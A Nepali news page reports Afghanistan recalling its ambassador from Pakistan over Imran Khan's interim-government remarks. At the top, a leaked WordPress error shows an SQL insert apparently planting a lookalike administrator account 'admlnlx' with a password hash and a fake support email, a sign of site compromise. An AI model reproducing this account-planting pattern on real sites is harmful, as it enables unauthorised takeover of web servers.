WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRVaMbl6F8GX5eRhxdL0aP301z7RoF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 01:25:58', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १३ चैत, काठमाडौं । अफगानिस्तानले पाकिस्तानबाट आफ्नो राजदूत फिर्ता बोलाएको छ । पाकिस्तानका प्रधानमन्त्री इमरान खानले दिएको एक अभिव्यक्तिबाट रुष्ट अफगानिस्तानले आफ्नो राजदूत फिर्ता बोलाएको हो ।
बीबीसीका अनुसार इमरान खानले हालै अफगानिस्तानमा अन्तरिम सरकार गठन हुनुपर्ने अभिव्यक्ति दिएका थिए । अफगानिस्तानमा अन्तरिम सरकार बनेमा अमेरिका र तालिबान समूहबीच वार्ताले गति लिने बताएका थिए । अफगानिस्तानले खानको यो अभिव्यक्तिलाई गैरजिम्मेवार भनेको छ ।
तालिबान समूहले अफगानिस्तानको वर्तमान सरकारसँग वार्ता नगर्ने अडान लिएको छ । असरफ गनी नेतृत्वको वर्तमान सरकार शान्ति प्रक्रियामा बाधा बनिरहेको अभिव्यक्तिसमेत इमरान खानले दिएको बीबीसीको समाचारमा उल्लेख छ ।
प्रधानमन्त्रीको अभिव्यक्तिबाट रुष्ट अफगानिस्तानले आन्तरिक मामिलामा दखल नदिन चेतावनी दिएको छ । अफगानिस्तानको विदेश मन्त्रालयका प्रवक्ताले ट्वीटरमा लेखेका छन्– पाकिस्तानले अफगानिस्तानको सम्प्रभुताको सम्मान गर्दैन, ऊ हस्तक्षेपको नीतिमा अगाडि बढिरहेको छ । यस विषयमा अफगानिस्तानले पाकिस्तानसँग स्पष्ट जवाफ समेत माग गरेको छ ।